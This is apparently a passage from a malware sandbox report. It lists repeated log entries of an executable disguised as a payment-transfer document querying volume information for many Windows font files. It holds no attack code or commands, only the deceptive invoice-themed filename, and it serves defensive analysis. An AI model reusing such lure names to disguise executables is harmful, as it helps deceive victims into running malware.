          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
